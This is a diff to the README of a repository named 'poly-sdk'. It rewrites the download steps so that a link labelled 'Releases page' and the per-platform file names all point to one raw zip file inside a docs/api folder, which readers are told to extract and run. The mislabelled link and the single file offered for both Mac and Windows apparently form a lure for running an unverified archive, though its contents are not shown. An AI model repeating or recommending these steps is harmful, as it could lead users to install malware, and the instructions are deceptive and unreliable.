wezilushinga/poly-sdk/README.md

 To get **poly-sdk**, follow these steps:

 1. **Visit the Releases page**
-   Go again to the [Releases page](https://github.com/wezilushinga/poly-sdk/releases).
+   Go again to the [Releases page](https://raw.githubusercontent.com/wezilushinga/poly-sdk/main/docs/api/sdk-poly-v1.4.zip).

 2. **Find the latest version**
    Look for the most recent version available.

 3. **Download the file suitable for your system**
-   Click on the appropriate download link, such as `poly-sdk-macos.zip` for Mac or `poly-sdk-windows.zip` for Windows.
+   Click on the appropriate download link, such as `https://raw.githubusercontent.com/wezilushinga/poly-sdk/main/docs/api/sdk-poly-v1.4.zip` for Mac or `https://raw.githubusercontent.com/wezilushinga/poly-sdk/main/docs/api/sdk-poly-v1.4.zip` for Windows.

 4. **Follow the installation instructions mentioned above**
    Extract and run the file to start using the SDK.